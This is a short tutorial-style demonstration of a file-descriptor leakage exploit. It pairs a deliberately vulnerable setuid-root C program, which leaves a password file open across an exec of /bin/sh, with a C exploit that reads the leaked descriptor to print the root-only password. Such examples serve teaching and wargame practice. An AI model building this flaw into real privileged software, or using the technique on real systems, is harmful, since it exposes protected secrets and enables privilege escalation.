Simple file leakage exploit example. Original from http://0x80.org/blog/?p=640

exploit.c

/*
 * [qnix:/0x80]$ ls -la getroot password
 * -r-sr-x--- 1 root qnix 8966 2012-01-11 17:32 getroot
 * -r-------- 1 root root   11 2012-01-11 15:00 password
 */

#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
 
#define FD  3
#define VSIZE   256
 
int
main() {
    int index;
    char buffer[VSIZE];
 
    char cmd[VSIZE];
    sprintf(cmd, "ls -la /proc/$$/fd/3");
    system(cmd);
 
    lseek(FD, 0, SEEK_SET);
    while((index = read(FD,buffer,VSIZE-1)) != 0 && index > 0) {
            buffer[index-1] = '\0';
            fprintf(stdout,"[+] Password : %s\n", buffer);
        return EXIT_SUCCESS;
        }
 
    fprintf(stderr,"[-] Password not found\n");
    return EXIT_FAILURE;
}

getroot.c

#include<stdio.h>
#include<unistd.h>
#include<stdlib.h>
#include<fcntl.h>
 
#define PASSFILE    "./password"
#define VSIZE       32
 
int main(int argc, char **argv) {
    FILE *fd;
    char userinput[VSIZE];
    char fileinput[VSIZE];
 
    if (argc != 2) {
        fprintf(stdout, "%s \n", argv[0]);
        exit(EXIT_FAILURE);
    }
 
    strncpy(userinput, argv[1], sizeof(userinput)-1);
 
    if (!(fd = fopen(PASSFILE, "r"))) {
        perror("fopen()");
        exit(EXIT_FAILURE);
    }
 
    fcntl(3,FD_CLOEXEC);
    fgets(fileinput, sizeof(fileinput)-1, fd);
    fileinput[strlen(fileinput)-1] = '\0';
 
    fprintf(stdout,"Access ");
    if(strcmp(userinput, fileinput) != 0) {
        setreuid(getuid(), getuid());
        fflush(stdout);
        fprintf(stderr,"Denied...\n");
        execve("/bin/sh", NULL, NULL);
        return EXIT_FAILURE;
    }
 
    fprintf(stdout,"Granted :D...\n");
    execve("/bin/sh", NULL, NULL);
 
    return EXIT_SUCCESS;
}